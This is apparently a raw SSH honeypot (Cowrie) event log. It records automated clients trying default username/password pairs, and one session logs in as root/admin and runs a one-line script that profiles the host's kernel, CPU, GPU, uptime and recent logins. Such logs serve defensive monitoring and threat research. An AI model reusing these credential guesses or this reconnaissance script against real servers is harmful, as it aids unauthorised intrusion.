{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:25.170491Z","src_ip":"212.227.125.160","session":"a09542743938"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:25.303873Z","src_ip":"212.227.125.160","session":"a09542743938"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:25.577928Z","src_ip":"212.227.125.160","session":"a09542743938"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:26.650742Z","src_ip":"212.227.125.160","session":"a09542743938"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":38792,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1797bc94bf0","protocol":"ssh","message":"New connection: 83.168.105.65:38792 (1.2.3.4:22) [session: a1797bc94bf0]","sensor":"my-vps","timestamp":"2025-08-26T11:53:28.042585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:28.043461Z","src_ip":"83.168.105.65","session":"a1797bc94bf0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:28.079418Z","src_ip":"83.168.105.65","session":"a1797bc94bf0"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:28.188931Z","src_ip":"83.168.105.65","session":"a1797bc94bf0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:29.226550Z","src_ip":"83.168.105.65","session":"a1797bc94bf0"}
{"eventid":"cowrie.session.closed","duration":120.00157928466797,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:29.928190Z","src_ip":"212.227.235.229","session":"2bdd7571e373"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59562,"dst_ip":"1.2.3.4","dst_port":22,"session":"1625a8cc7a1f","protocol":"ssh","message":"New connection: 212.227.125.160:59562 (1.2.3.4:22) [session: 1625a8cc7a1f]","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.120314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.150833Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.205892Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.609977Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:53:30.800149Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.800924Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.801478Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.802485Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.803543Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.804373Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.805153Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.806261Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.806934Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.807400Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.807877Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.808465Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:53:30.809098Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:53:31.043141Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:31.044147Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:31.045169Z","src_ip":"212.227.125.160","session":"1625a8cc7a1f"}
{"eventid":"cowrie.session.closed","duration":31.409690856933594,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:31.077384Z","src_ip":"212.227.125.160","session":"ba6a7d24e84b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44418,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b527a955f23","protocol":"ssh","message":"New connection: 212.227.125.160:44418 (1.2.3.4:22) [session: 5b527a955f23]","sensor":"my-vps","timestamp":"2025-08-26T11:53:32.815847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:32.816612Z","src_ip":"212.227.125.160","session":"5b527a955f23"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:32.877103Z","src_ip":"212.227.125.160","session":"5b527a955f23"}
{"eventid":"cowrie.login.failed","username":"man","password":"man","message":"login attempt [man/man] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:33.051886Z","src_ip":"212.227.125.160","session":"5b527a955f23"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:34.108014Z","src_ip":"212.227.125.160","session":"5b527a955f23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45186,"dst_ip":"1.2.3.4","dst_port":22,"session":"a12c70a67744","protocol":"ssh","message":"New connection: 212.227.125.160:45186 (1.2.3.4:22) [session: a12c70a67744]","sensor":"my-vps","timestamp":"2025-08-26T11:53:37.087436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:37.147437Z","src_ip":"212.227.125.160","session":"a12c70a67744"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:37.148092Z","src_ip":"212.227.125.160","session":"a12c70a67744"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:37.389826Z","src_ip":"212.227.125.160","session":"a12c70a67744"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:38.443249Z","src_ip":"212.227.125.160","session":"a12c70a67744"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45954,"dst_ip":"1.2.3.4","dst_port":22,"session":"d580fed0f4df","protocol":"ssh","message":"New connection: 212.227.125.160:45954 (1.2.3.4:22) [session: d580fed0f4df]","sensor":"my-vps","timestamp":"2025-08-26T11:53:42.606922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:42.607962Z","src_ip":"212.227.125.160","session":"d580fed0f4df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:42.659055Z","src_ip":"212.227.125.160","session":"d580fed0f4df"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"minecraft","message":"login attempt [minecraft/minecraft] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:42.830584Z","src_ip":"212.227.125.160","session":"d580fed0f4df"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41442,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a1d822afb27","protocol":"ssh","message":"New connection: 83.168.105.65:41442 (1.2.3.4:22) [session: 5a1d822afb27]","sensor":"my-vps","timestamp":"2025-08-26T11:53:43.699170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:53:43.699806Z","src_ip":"83.168.105.65","session":"5a1d822afb27"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:53:43.737402Z","src_ip":"83.168.105.65","session":"5a1d822afb27"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-26T11:53:43.848814Z","src_ip":"83.168.105.65","session":"5a1d822afb27"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:43.953531Z","src_ip":"212.227.125.160","session":"d580fed0f4df"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:53:44.888019Z","src_ip":"83.168.105.65","session":"5a1d822afb27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46724,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb2b46c29a3e","protocol":"ssh","message":"New connection: 212.227.125.160:46724 (1.2.3.4:22) [session: bb2b46c29a3e]","sensor":"my-vps","timestamp":"2025-08-26T11:53:48.396187Z"}
